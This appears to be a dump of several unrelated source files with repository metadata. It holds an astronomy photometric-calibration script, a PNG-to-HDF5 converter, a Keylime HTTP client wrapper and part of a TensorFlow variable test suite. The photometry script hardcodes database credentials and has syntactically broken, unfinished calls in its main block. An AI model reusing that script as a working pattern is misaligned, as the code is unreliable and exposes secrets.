meanerr = Numeric.sum(err_save)/len(err_save)
solutions.append([params, perror, redchisq, meanerr, condition])
return solutions
def SigmaCond(p, data_save, data, airmass_save, airmass, color_save, color, err_save, err, sigmareject):
if len(data_save) > 1:
#airmass = airmass[int(0.1*len(airmass)):int(0.9*len(airmass))]
#color = color[int(0.1*len(color)):int(0.9*len(color))]
#data = data[int(0.1*len(data)):int(0.9*len(data))]
mo = p[0] + p[1]*airmass + p[2]*color
mo_save = p[0] + p[1]*airmass_save + p[2]*color_save
print len(data), len(mo), len(err)
reddm = (data-mo)/err
redchisq = Numeric.sqrt(Numeric.sum(Numeric.power(reddm, 2)) / (len(reddm) - 1))
dm = data-mo
dm_save = data_save - mo_save
mean = Numeric.sum(dm)/len(dm)
sigma = Numeric.sqrt(Numeric.sum(Numeric.power(mean-dm, 2)) / (len(dm) - 1))
#condition = Numeric.less(Numeric.fabs(dm_save), float(sigmareject) * sigma)
condition = Numeric.less(Numeric.fabs(dm_save), float(sigmareject) * err_save)
else:
condition = Numeric.zeros(len(data_save))
return condition, redchisq
def makePlots(data, airmass, color, outfile, solutions, label):
file = outfile+".ps"
pgbeg(file+"/cps", 2, 3)
pgiden()
for i in range(3):
result = solutions[i]
# Airmass plot
pgpanl(1, i+1)
airMin = 1
airMax = Numeric.sort(airmass)[-1]*1.1
print result
dataAirMax = result[0][0]+result[0][1]+1
dataAirMin = result[0][0]+result[0][1]-1
dataColMax = result[0][0]+1
dataColMin = result[0][0]-1
colMinVal = Numeric.sort(color)[0]
if colMinVal < 0:
colMin = colMinVal*1.1
else:
colMin = colMinVal*0.95
colMax = Numeric.sort(color)[-1]*1.1
if result[0] and result[1]:
eqStr = "%d parameter fit: Mag-Mag(Inst) = %.2f\\(2233)%.2f + (%.2f\\(2233)%.2f) airmass + "\
"(%.2f\\(2233)%.2f) color" % \
(3-i, result[0][0], result[1][0], result[0][1], result[1][1], result[0][2], result[1][2])
else:
eqStr = "%d parameter fit not possible" % (3-i, )
fixenv([1, airMax] ,
[dataAirMin, dataAirMax],
eqStr, label=["Airmass", "Mag - Mag(Inst)"])
condition = result[4]
goodAirmass = Numeric.compress(condition, airmass)
goodData = Numeric.compress(condition, data)
goodColor = Numeric.compress(condition, color)
badAirmass = Numeric.compress(Numeric.logical_not(condition), airmass)
badData = Numeric.compress(Numeric.logical_not(condition), data)
badColor = Numeric.compress(Numeric.logical_not(condition), color)
if len(goodData):
pgsci(3)
# Rescale to zero color and filter for data within
# our plotting range
plotData = goodData-result[0][2]*goodColor
plotCond1 = Numeric.less(plotData, dataAirMax)
plotCond2 = Numeric.greater(plotData, dataAirMin)
plotCond = Numeric.logical_and(plotCond1, plotCond2)
plotAirmass = Numeric.compress(plotCond, goodAirmass)
plotData = Numeric.compress(plotCond, plotData)
pgpt(plotAirmass, plotData, 5)
print type(plotAirmass), type(plotData)
if len(badData):
pgsci(2)
plotData = badData-result[0][2]*badColor
plotCond1 = Numeric.less(plotData, dataAirMax)
plotCond2 = Numeric.greater(plotData, dataAirMin)
plotCond = Numeric.logical_and(plotCond1, plotCond2)
plotAirmass = Numeric.compress(plotCond, badAirmass)
plotData = Numeric.compress(plotCond, plotData)
pgpt(plotAirmass, plotData, 5)
pgsci(1)
a = Numeric.arange(1, airMax, 0.01)
m = result[0][0] + result[0][1] * a
pgline(a, m)
# Color Plot
pgpanl(2, i+1)
fixenv([colMin, colMax] ,
[dataColMin, dataColMax],
eqStr, label=[label, "Mag - Mag(Inst)"])
if len(goodData):
pgsci(3)
# Rescale to zero airmass and filter for data within
# our plotting range
plotData = goodData-result[0][1]*goodAirmass
plotCond1 = Numeric.less(plotData, dataColMax)
plotCond2 = Numeric.greater(plotData, dataColMin)
plotCond = Numeric.logical_and(plotCond1, plotCond2)
plotColor = Numeric.compress(plotCond, goodColor)
plotData = Numeric.compress(plotCond, plotData)
pgpt(plotColor, plotData, 5)
if len(badData):
pgsci(2)
plotData = badData-result[0][1]*badAirmass
plotCond1 = Numeric.less(plotData, dataColMax)
plotCond2 = Numeric.greater(plotData, dataColMin)
plotCond = Numeric.logical_and(plotCond1, plotCond2)
plotColor = Numeric.compress(plotCond, badColor)
plotData = Numeric.compress(plotCond, plotData)
pgpt(plotColor, plotData, 5)
pgsci(1)
a = Numeric.arange(colMin, colMax, 0.01)
m = result[0][0] + result[0][2] * a
pgline(a, m)
return
def fixenv (xrange=[0,1], yrange=[0,1], fname="none", ci = 1, label=["x", "y"]):
# set axis ranges.
pgswin(xrange[0], xrange[1], yrange[0], yrange[1])
pgsci(ci) # set color index.
pgbox() # draw axes.
pgsci(1) # back to color index 1 (white)
pglab(label[0], label[1], fname) # label the plot
return
def saveResults(file, solutions, step, sigmareject, cluster, colorused):
f = open(file+".asc", "w")
which_solution = 0
import MySQLdb, sys, os, re
db2 = MySQLdb.connect(db='subaru', user='weaklensing', passwd='darkmatter', host='ki-rh8')
c = db2.cursor()
#c.execute("DROP TABLE IF EXISTS photometry_db")
for result in solutions:
which_solution += 1
if Numeric.sometrue(result[2]):
import os , time
user_name = os.environ['USER']
bonn_target = os.environ['BONN_TARGET']
bonn_filter = os.environ['BONN_FILTER']
time_now = time.asctime()
user = user_name #+ str(time.time())
standardstartype = os.environ['STANDARDSTARTYPE']
floatvars = {'ZP':result[0][0],'AIRMASS':result[0][1],'COLOR':result[0][2],'ZPERR':result[1][0],'AIRMASSERR':result[1][1],'COLORERR':result[1][2],'REDCHISQ':result[2],'MEANERR':result[3]}
stringvars = {'USER':user_name,'BONN_TARGET':bonn_target,'BONN_FILTER':bonn_filter,'TIME':time_now,'CHOICE':'', 'NUMBERVARS':4-which_solution,'STANDARDSTARTYPE':standardstartype,'USER': user, 'step': step, 'sigmareject':sigmareject, 'cluster':cluster,'colorused':colorused}
# make database if it doesn't exist
make_db = reduce(lambda x,y: x + ',' + y,[x + ' float(30)' for x in floatvars.keys()])
make_db += ',' + reduce(lambda x,y: x + ',' + y,[x + ' varchar(80)' for x in stringvars.keys()])
command = "CREATE TABLE IF NOT EXISTS photometry_db ( id MEDIUMINT NOT NULL AUTO_INCREMENT, PRIMARY KEY (id), " + make_db + ")"
print command
#c.execute(command)
# insert new observation
names = reduce(lambda x,y: x + ',' + y, [x for x in floatvars.keys()])
values = reduce(lambda x,y: str(x) + ',' + str(y), [floatvars[x] for x in floatvars.keys()])
names += ',' + reduce(lambda x,y: x + ',' + y, [x for x in stringvars.keys()])
values += ',' + reduce(lambda x,y: x + ',' + y, ["'" + str(stringvars[x]) + "'" for x in stringvars.keys()])
command = "INSERT INTO photometry_db (" + names + ") VALUES (" + values + ")"
print command
#c.execute(command)
f.write("%s %s %s\n" % (result[0][0], result[0][1], result[0][2]))
f.write("%s %s %s\n" % (result[1][0], result[1][1], result[1][2]))
f.write("%s#ReducedChiSq\n" % (result[2]))
f.write("%s#MeanError\n" % (result[3]))
f.write("%s\n" % (id))
else:
f.write("-1 -1 -1\n")
f.write("-1 -1 -1\n")
f.write("-1#ReducedChiSq\n")
f.write("-1#MeanError\n")
f.write("%s\n" % (id))
f.close
return id
def usage():
print "Usage:"
print "photo_abs.py -i input -f filter -n GABODSID - e ext. coeff. -c color coeff. -o output -l label"
print
print " -i, --input=STRING Input file, must have 4 columns: Instrumental Mag, Standard Mag, Color, Airmass"
print " -o, --output=STRING Output file basename"
print " -n, --night=INT GABODSID, unique numerical night identifier"
print " -e, --extinction=FLOAT Default value of extinction coefficient for one/two parameter fit"
print " -c, --color=FLOAT Default value of color term for one parameter fit"
print " -l, --label=STRING Label for color axis (e.g. B-V)"
print
print "Author:"
print " Joerg Dietrich <[email protected]>"
print
return
if __name__ == "__main__":
__bonn_logger_id__ = BonnLogger.addCommand('maskBadOverscans.py',
sys.argv[1:])
try:
opts, args = getopt.getopt(sys.argv[1:],
"i:n:o:e:c:l:s:",
["input=", "night=", "extinction=",
"color=", "output=", "label=","sigmareject=","step=","cluster=","colorused="])
except getopt.GetoptError:
usage()
BonnLogger.updateStatus(__bonn_logger_id__, 1)
sys.exit(2)
print sys.argv[1:]
infile = night = extcoeff = colcoeff = outfile = label = sigmareject = step = cluster = colorused = None
for o, a in opts:
if o in ("-i", "--input"):
infile = a
elif o in ("-o", "--output"):
outfile = a
elif o in ("-n", "--night"):
night = int(a)
elif o in ("-e", "--extinction"):
extcoeff = float(a)
elif o in ("-c", "--color"):
colcoeff = float(a)
elif o in ("-l", "--label"):
label = a
elif o in ("-s", "--sigmareject"):
sigmareject = float(a)
elif o in ("-t", "--step"):
step = a
elif o in ("-c", "--cluster"):
cluster = a
elif o in ("-u", "--colorused"):
colorused = a
else:
print "option:", o
usage()
BonnLogger.updateStatus(__bonn_logger_id__, 1)
sys.exit(2)
print cluster
#raw_input()
if not infile or night==None or not outfile or \
extcoeff==None or colcoeff==None or label==None:
#print infile, night, outfile, coeff, color
usage()
BonnLogger.updateStatus(__bonn_logger_id__, 1)
sys.exit(2)
data, airmass, color, magErr = readInput(infile)
#solutions = photCalib(data, airmass, color, magErr, [24, extcoeff, colcoeff], sigmareject)
solutions = photCalib({'data':data, 'dataerr':dataerr, vars:{'airmass':airmass, 'color':color}, 'guesses':{'airmasscoeff': airmasscoeff, 'colorcoeff':colorcoeff}, 'sigmareject':sigmareject, fit=[{'function':func_0(airmass,color)},{'function'['color']]})
solutions = photCalib({'data':data, 'dataerr':dataerr, vars:{'X':X,'Y':Y}, 'sigmareject':sigmareject, fit=[['A','B','C','D','E','F'],['color']]})
makePlots(data, airmass, color, outfile, solutions, label)
saveResults(outfile, solutions, step, sigmareject, cluster, colorused)
BonnLogger.updateStatus(__bonn_logger_id__, 0)
| mit | 5,730,884,299,488,931,000 | 37.771186 | 279 | 0.556175 | false |
google/ffn | ffn/utils/png_to_h5.py | 1 | 1099 | # Copyright 2017 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Converts PNG files from the working directory into a HDF5 volume.
Usage:
./png_to_h5.py output_filename.h5
"""
import glob
import sys
import h5py
import numpy as np
from scipy import misc
assert len(sys.argv) >= 2
png_files = glob.glob('*.png')
png_files.sort()
images = [misc.imread(i) for i in png_files]
images = np.array(images)
with h5py.File(sys.argv[1], 'w') as f:
f.create_dataset('raw', data=images, compression='gzip')
| apache-2.0 | 2,254,648,750,721,236,200 | 29.527778 | 80 | 0.682439 | false |
mit-ll/python-keylime | keylime/requests_client.py | 1 | 1577 | import requests
class RequestsClient:
def __init__(self, base_url, tls_enabled, **kwargs):
if tls_enabled:
self.base_url = f'https://{base_url}'
else:
self.base_url = f'http://{base_url}'
self.session = requests.Session()
for arg in kwargs:
if isinstance(kwargs[arg], dict):
kwargs[arg] = self.__deep_merge(
getattr(self.session, arg), kwargs[arg])
setattr(self.session, arg, kwargs[arg])
def request(self, method, url, **kwargs):
return self.session.request(method, self.base_url + url, **kwargs)
def head(self, url, **kwargs):
return self.session.head(self.base_url + url, **kwargs)
def get(self, url, **kwargs):
return self.session.get(self.base_url + url, **kwargs)
def post(self, url, **kwargs):
return self.session.post(self.base_url + url, **kwargs)
def put(self, url, **kwargs):
return self.session.put(self.base_url + url, **kwargs)
def patch(self, url, **kwargs):
return self.session.patch(self.base_url + url, **kwargs)
def delete(self, url, **kwargs):
return self.session.delete(self.base_url + url, **kwargs)
@staticmethod
def __deep_merge(source, destination):
for key, value in source.items():
if isinstance(value, dict):
node = destination.setdefault(key, {})
RequestsClient.__deep_merge(value, node)
else:
destination[key] = value
return destination
| bsd-2-clause | -8,650,900,157,701,840,000 | 33.282609 | 74 | 0.577045 | false |
gunan/tensorflow | tensorflow/python/kernel_tests/resource_variable_ops_test.py | 1 | 65396 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.resource_variable_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import gc
import os
import pickle
import re
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import tensor_pb2
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import cpp_shape_inference_pb2
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import custom_gradient
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import list_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import momentum
from tensorflow.python.training import saver
from tensorflow.python.training import training_util
from tensorflow.python.util import compat
@test_util.with_control_flow_v2
class ResourceVariableOpsTest(test_util.TensorFlowTestCase,
parameterized.TestCase):
def tearDown(self):
gc.collect()
# This will only contain uncollectable garbage, i.e. reference cycles
# involving objects with __del__ defined.
self.assertEmpty(gc.garbage)
super(ResourceVariableOpsTest, self).tearDown()
@test_util.run_deprecated_v1
def testHandleDtypeShapeMatch(self):
with self.cached_session():
handle = resource_variable_ops.var_handle_op(dtype=dtypes.int32, shape=[])
with self.assertRaises(ValueError):
resource_variable_ops.assign_variable_op(
handle, constant_op.constant(0.0, dtype=dtypes.float32)).run()
with self.assertRaises(ValueError):
resource_variable_ops.assign_variable_op(handle,
constant_op.constant(
[0],
dtype=dtypes.int32)).run()
resource_variable_ops.assign_variable_op(handle,
constant_op.constant(
0,
dtype=dtypes.int32)).run()
@test_util.run_gpu_only
def testGPUInt64(self):
with context.eager_mode(), context.device("gpu:0"):
v = resource_variable_ops.ResourceVariable(1, dtype=dtypes.int64)
self.assertAllEqual(1, v.numpy())
def testEagerNameNotIdentity(self):
with context.eager_mode():
v0 = resource_variable_ops.ResourceVariable(1.0, name="a")
v1 = resource_variable_ops.ResourceVariable(2.0, name="a")
self.assertAllEqual(v0.numpy(), 1.0)
self.assertAllEqual(v1.numpy(), 2.0)
def testEagerNameNotNeeded(self):
with context.eager_mode():
v0 = resource_variable_ops.ResourceVariable(1.0)
self.assertAllEqual(v0.numpy(), 1.0)
def testReadVariableDtypeMismatchEager(self):
with context.eager_mode():
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1], name="foo")
resource_variable_ops.assign_variable_op(handle, 1)
with self.assertRaisesRegexp(
errors.InvalidArgumentError,
"Trying to read variable with wrong dtype. "
"Expected float got int32"):
_ = resource_variable_ops.read_variable_op(handle, dtype=dtypes.float32)
def testEagerInitializedValue(self):
with context.eager_mode():
variable = resource_variable_ops.ResourceVariable(1.0, name="eager-init")
self.assertAllEqual(variable.numpy(), 1.0)
self.assertAllEqual(variable.initialized_value().numpy(), 1.0)
def testInitializeVariableUsingInitializedValue(self):
var1 = resource_variable_ops.ResourceVariable(1.0, name="var1")
var2 = resource_variable_ops.ResourceVariable(var1.initialized_value(),
name="var2")
self.assertAllEqual(var2.initialized_value(), 1.0)
def testEagerBool(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(False, name="bool_test")
self.assertAllEqual(bool(v), False)
def testEagerDeepCopy(self):
with context.eager_mode():
init_value = np.ones((4, 4, 4))
variable = resource_variable_ops.ResourceVariable(init_value,
name="init")
copied_variable = copy.deepcopy(variable)
self.assertEqual(variable.name, copied_variable.name)
self.assertEqual(variable.shape, copied_variable.shape)
self.assertEqual(variable.device, copied_variable.device)
# The copied variable should have the same value as the original.
self.assertAllEqual(variable.numpy(), copied_variable.numpy())
# Updates to the copy should not be reflected in the original.
copied_variable.assign(4 * np.ones((4, 4, 4)))
self.assertNotAllEqual(variable.numpy(), copied_variable.numpy())
@test_util.run_deprecated_v1
def testGraphDeepCopy(self):
with self.cached_session():
init_value = np.ones((4, 4, 4))
variable = resource_variable_ops.ResourceVariable(init_value,
name="init")
with self.assertRaises(NotImplementedError):
copy.deepcopy(variable)
@test_util.run_in_graph_and_eager_modes
def testStridedSliceAssign(self):
v = resource_variable_ops.ResourceVariable([1.0, 2.0])
self.evaluate(variables.global_variables_initializer())
self.evaluate(v[0].assign(2.0))
self.assertAllEqual(self.evaluate(v), [2.0, 2.0])
@test_util.run_in_graph_and_eager_modes
def testVariableShape(self):
v = resource_variable_ops.ResourceVariable([1., 1.])
self.assertAllEqual(
tensor_util.constant_value(
resource_variable_ops.variable_shape(v.handle)),
[2])
@test_util.run_deprecated_v1
def testDifferentAssignGraph(self):
with ops.Graph().as_default():
v = resource_variable_ops.ResourceVariable(1.0)
ops.reset_default_graph()
v.assign(2.0) # Note: this fails if we run convert_to_tensor on not the
# variable graph.
@test_util.run_deprecated_v1
def testFetchHandle(self):
with self.cached_session():
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1], name="foo")
self.assertNotEmpty(handle.eval())
@test_util.run_deprecated_v1
def testCachedValueReadBeforeWrite(self):
with self.cached_session() as sess:
v = resource_variable_ops.ResourceVariable(0.0, caching_device="cpu:0")
self.evaluate(v.initializer)
value, _ = sess.run([v, v.assign_add(1.0)])
self.assertAllEqual(value, 0.0)
def testAssignVariableDtypeMismatchEager(self):
with context.eager_mode():
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1], name="foo")
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([1]))
with self.assertRaisesRegexp(
errors.InvalidArgumentError, "Trying to assign variable with wrong "
"dtype. Expected int32 got float"):
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([1.], dtype=dtypes.float32))
def testRepr(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(1)
text = "%r" % v
self.assertEqual(
"<tf.Variable 'Variable:0' shape=() dtype=int32, numpy=1>", text)
def testReprUnavailable(self):
with context.eager_mode():
v = resource_variable_ops.ResourceVariable(1)
# Monkey-patch this variable to not have an available value
def broken_read():
raise ValueError("This doesn't work")
v.read_value = broken_read
text = "%r" % v
self.assertEqual("<tf.Variable 'Variable:0' shape=() dtype=int32,"
" numpy=<unavailable>>", text)
def testUnprintableHandle(self):
with context.eager_mode():
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1], name="foo")
self.assertIn("<unprintable>", str(handle))
self.assertIn("<unprintable>", repr(handle))
@test_util.run_in_graph_and_eager_modes
def testDtypeSurvivesIdentity(self):
handle = resource_variable_ops.var_handle_op(dtype=dtypes.int32, shape=[])
id_handle = array_ops.identity(handle)
self.evaluate(resource_variable_ops.assign_variable_op(
id_handle, constant_op.constant(0, dtype=dtypes.int32)))
def testUnreadOpName(self):
v = resource_variable_ops.ResourceVariable(1.0)
self.assertNotEqual(v.name, v.assign_add(1.0).name)
@test_util.run_in_graph_and_eager_modes
def testCreateRead(self):
handle = resource_variable_ops.var_handle_op(dtype=dtypes.int32, shape=[])
self.evaluate(resource_variable_ops.assign_variable_op(
handle, constant_op.constant(1, dtype=dtypes.int32)))
value = self.evaluate(
resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32))
self.assertAllEqual(1, value)
@test_util.run_in_graph_and_eager_modes
def testManyAssigns(self):
handle = resource_variable_ops.var_handle_op(dtype=dtypes.int32, shape=[])
create = resource_variable_ops.assign_variable_op(
handle, constant_op.constant(1, dtype=dtypes.int32))
with ops.control_dependencies([create]):
first_read = resource_variable_ops.read_variable_op(
handle, dtype=dtypes.int32)
with ops.control_dependencies([first_read]):
write = resource_variable_ops.assign_variable_op(
handle, constant_op.constant(2, dtype=dtypes.int32))
with ops.control_dependencies([write]):
second_read = resource_variable_ops.read_variable_op(
handle, dtype=dtypes.int32)
f, s = self.evaluate([first_read, second_read])
self.assertEqual(f, 1)
self.assertEqual(s, 2)
@test_util.run_in_graph_and_eager_modes
def testAssignAdd(self):
handle = resource_variable_ops.var_handle_op(dtype=dtypes.int32, shape=[])
self.evaluate(resource_variable_ops.assign_variable_op(
handle, constant_op.constant(1, dtype=dtypes.int32)))
self.evaluate(resource_variable_ops.assign_add_variable_op(
handle, constant_op.constant(1, dtype=dtypes.int32)))
read = self.evaluate(
resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32))
self.assertEqual(read, 2)
@test_util.run_in_graph_and_eager_modes
def testScatterAdd(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_add(
handle, [0], constant_op.constant([[2]], dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[3]])
@test_util.run_in_graph_and_eager_modes
def testGradientGatherNd(self):
v = resource_variable_ops.ResourceVariable(
np.random.uniform(size=[2, 2]), dtype=dtypes.float32)
with backprop.GradientTape() as tape:
l = array_ops.gather_nd(v, [[1, 1]])
l = math_ops.reduce_sum(l)
grads = tape.gradient(l, v)
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(self.evaluate(grads), [[0., 0.], [0., 1.]])
@test_util.run_deprecated_v1
def testDefaultGradientDtype(self):
v = resource_variable_ops.ResourceVariable(
np.random.uniform(size=[2, 2]), dtype=dtypes.float64)
c = constant_op.constant(1.)
identity = array_ops.identity_n([c, v.handle])
# TODO(b/137403775): Remove this.
custom_gradient.copy_handle_data(v.handle, identity[1])
g = gradients_impl.gradients(identity[0], [c, v.handle])
self.assertEqual(g[1].dtype, dtypes.float64)
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(g[1], [[0., 0.], [0., 0.]])
@test_util.run_deprecated_v1
def testUnconnectedGradientZeros(self):
b = resource_variable_ops.ResourceVariable(initial_value=[[3., 4.]])
c = constant_op.constant(0.)
g = gradients_impl.gradients(c, [b], unconnected_gradients="zero")[0]
self.assertAllEqual(g.shape.as_list(), [1, 2])
@test_util.run_deprecated_v1
def testGradientCondInWhileLoop(self):
v = resource_variable_ops.ResourceVariable(initial_value=1.0)
def cond(i, unused_x):
return i < 1
def body(i, x):
def true():
return x + v
def false():
return 2.0 * v
return i + 1, control_flow_ops.cond(i > 0, true, false)
_, x = control_flow_ops.while_loop(cond, body, [0, 0.0])
# Computing gradients does not produce an exception:
g = gradients_impl.gradients(x, v)
self.evaluate(variables.global_variables_initializer())
# Only the false branch is taken so the gradient is 2.
self.assertAllEqual(g[0], 2.0)
@test_util.run_in_graph_and_eager_modes
def testGradientGatherNdIndexedSlices(self):
v = resource_variable_ops.ResourceVariable(
np.random.uniform(size=[2, 2]), dtype=dtypes.float32)
with backprop.GradientTape() as tape:
l = array_ops.gather_nd(v, [[1], [1]])
l = math_ops.reduce_sum(l)
grads = tape.gradient(l, v)
self.evaluate(variables.global_variables_initializer())
self.assertAllEqual(self.evaluate(grads.values), [[1., 1.], [1., 1.]])
@test_util.run_in_graph_and_eager_modes
def testScatterSub(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_sub(
handle, [0], constant_op.constant([[2]], dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[-1]])
@test_util.run_in_graph_and_eager_modes
def testScatterMul(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_mul(
handle, [0], constant_op.constant([[5]], dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[5]])
def testEagerPickle(self):
with context.eager_mode():
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, "var.pickle")
with open(fname, "wb") as f:
v = resource_variable_ops.ResourceVariable(
10.0,
dtype=dtypes.float16,
name="v")
pickle.dump(v, f)
with open(fname, "rb") as f:
new_v = pickle.load(f)
self.assertEqual(new_v.name, v.name)
self.assertEqual(new_v.shape, v.shape)
self.assertEqual(new_v.dtype, v.dtype)
self.assertEqual(new_v.trainable, v.trainable)
self.assertAllEqual(new_v.numpy(), v.numpy())
@test_util.run_in_graph_and_eager_modes
def testScatterDiv(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[6]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_div(
handle, [0], constant_op.constant([[3]], dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[2]])
def testUseResource(self):
v = variables.VariableV1(1.0, use_resource=True)
self.assertIsInstance(v, resource_variable_ops.ResourceVariable)
def testEagerNoUseResource(self):
with context.eager_mode():
v = variables.Variable(1.0)
self.assertIsInstance(v, resource_variable_ops.ResourceVariable)
@test_util.run_in_graph_and_eager_modes
def testScatterMin(self):
with ops.device("cpu:0"):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(handle,
constant_op.constant(
[[6]],
dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_min(handle, [0],
constant_op.constant(
[[3]],
dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[3]])
def testMetagraph(self):
with ops.Graph().as_default():
with variable_scope.variable_scope("foo", use_resource=True):
a = variable_scope.get_variable("a", initializer=10.0)
momentum.MomentumOptimizer(
learning_rate=0.001, momentum=0.1).minimize(
a,
colocate_gradients_with_ops=True,
global_step=training_util.get_or_create_global_step())
graph = ops.get_default_graph()
meta_graph_def = saver.export_meta_graph(graph=graph)
with ops.Graph().as_default():
saver.import_meta_graph(meta_graph_def, import_scope="")
meta_graph_two = saver.export_meta_graph(graph=graph)
self.assertEqual(meta_graph_def, meta_graph_two)
@test_util.run_in_graph_and_eager_modes
def testScatterMax(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[6]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_max(
handle, [0], constant_op.constant([[3]], dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[6]])
@test_util.run_in_graph_and_eager_modes
def testScatterAddScalar(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_add(
handle, [0], constant_op.constant(2, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[3]])
@test_util.run_in_graph_and_eager_modes
def testScatterSubScalar(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_sub(
handle, [0], constant_op.constant(2, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[-1]])
@test_util.run_in_graph_and_eager_modes
def testScatterMulScalar(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[1]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_mul(
handle, [0], constant_op.constant(5, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[5]])
@test_util.run_in_graph_and_eager_modes
def testScatterDivScalar(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[6]], dtype=dtypes.int32)))
self.evaluate(
resource_variable_ops.resource_scatter_div(
handle, [0], constant_op.constant(3, dtype=dtypes.int32)))
read = resource_variable_ops.read_variable_op(handle, dtype=dtypes.int32)
self.assertEqual(self.evaluate(read), [[2]])
@test_util.run_in_graph_and_eager_modes
def testScatterMinScalar(self):
handle = resource_variable_ops.var_handle_op(
dtype=dtypes.int32, shape=[1, 1])
self.evaluate(
resource_variable_ops.assign_variable_op(
handle, constant_op.constant([[6]], dtype=dtypes.int32)))
self.evaluate(
